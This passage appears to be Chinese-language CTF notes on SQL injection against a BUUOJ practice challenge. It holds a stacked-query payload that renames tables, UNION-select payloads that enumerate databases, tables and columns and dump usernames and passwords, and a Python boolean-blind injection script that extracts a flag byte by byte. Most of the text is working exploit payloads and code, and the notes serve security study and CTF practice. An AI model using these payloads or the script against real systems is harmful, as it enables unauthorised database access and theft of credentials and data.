1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#
拆分开来如下
1';alter table 源表名 rename to 源表名1;alter table 目标表名 rename to 源表名;alter table 源表名 change flag id varchar(50);#
第四种:使用union select
利用 order by 4# 确定列数，再用 union select 1,2,3,4# 确定回显点
union select 1,2,database()#用于确定当前数据库名称
union select 1,2,group_concat(schema_name) from information_schema.schemata#用于查看所有数据库名称
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#用于确定表名
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#用于确定字段名（注意必须使用英文直引号，中文弯引号会导致 SQL 语法错误）
union select 1,2,group_concat(id,username,password) from (databasename.tablename)#输出数据
import requests
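def _search_byte(is_greater, lo=32, hi=126):
    """Binary-search one byte value inside the closed range [lo, hi].

    is_greater(mid) must answer "is the hidden value > mid?" and be monotone.
    Returns the value the search converges on. A hidden value outside
    [lo, hi] is clamped to the nearest bound, so a result equal to hi is
    ambiguous (it means "value >= hi"); the default range covers printable
    ASCII only.
    """
    while lo < hi:
        mid = (lo + hi) // 2
        if is_greater(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def leak_string(is_greater_at, max_len=99):
    """Recover a hidden string byte by byte through a boolean oracle.

    is_greater_at(pos, value) -> bool must be True exactly when the byte at
    1-based position pos of the hidden string is > value.

    Extraction stops after max_len bytes or at the first position that
    resolves to a space (ASCII 32). The original script used that as the
    end-of-string marker: once pos runs past the end, the oracle is expected
    to answer False for every value, so the search bottoms out at 32
    (MySQL's ascii('') is 0 -- confirm this for any other backend). A
    literal space inside the secret therefore also ends the leak early.

    Returns the recovered string; prints the running prefix after each byte
    so progress is visible during a slow blind extraction.
    """
    result = ""
    for pos in range(1, max_len + 1):
        # Bind pos now; the lambda is consumed before the next iteration.
        code = _search_byte(lambda v, p=pos: is_greater_at(p, v))
        if chr(code) == " ":
            break
        result += chr(code)
        print(result)
    return result


if __name__ == '__main__':
    url = "http://1bf27f3e-0eb4-41fd-8991-aef8381dbfbc.node3.buuoj.cn/index.php"
    # Boolean-based blind injection: the page prints "Hello" only when the
    # injected condition holds, so 0^(cond) toggles id between 0 and 1.
    template = "0^(ascii(substr((select(flag)from(flag)),{0},1))>{1})"
    # One session reuses the TCP connection across the ~7 probes per byte.
    session = requests.Session()

    def oracle(pos, value):
        # timeout: a stalled target must not hang the extraction forever.
        resp = session.post(url, data={"id": template.format(pos, value)}, timeout=10)
        return "Hello" in resp.text

    flag = leak_string(oracle)
    print("flag:", flag)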